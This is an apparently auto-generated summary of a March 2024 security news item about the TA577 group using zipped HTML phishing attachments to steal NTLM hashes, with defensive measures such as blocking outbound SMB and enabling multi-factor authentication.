March 4, 2024 at 04:46PM
TA577 hacking group has shifted to using phishing emails to steal NTLM authentication hashes for account hijacks. They launched campaigns targeting employees’ NTLM hashes, using unique ZIP archives containing HTML files to trigger automatic connections, stealing the hashes. Proofpoint advises specific security measures to counter this threat, including blocking outbound SMB connections and implementing email filtering.
Based on the meeting notes, the key takeaways are:
1. TA577 has shifted tactics to using phishing emails to steal NT LAN Manager (NTLM) authentication hashes for account hijacks.
2. These attacks target Windows devices and aim to capture NTLM hashes through malicious HTML files in zip archives that trigger automatic connections to external servers.
3. The stolen hashes can be used in “pass-the-hash” attacks to escalate privileges, hijack accounts, access sensitive information, evade security products, and move laterally within breached networks.
4. Multi-factor authentication should be enabled to prevent the use of stolen hashes to breach networks.
5. Possible protective measures include configuring firewalls to block outbound SMB connections, implementing email filtering to block messages containing zipped HTML files, and using Windows group policies to restrict outgoing NTLM traffic.
6. Organizations using Windows 11 have an additional security feature to block NTLM-based attacks over SMBs.
These takeaways provide a clear understanding of the current tactics employed by TA577 and the corresponding protective measures that organizations can consider implementing.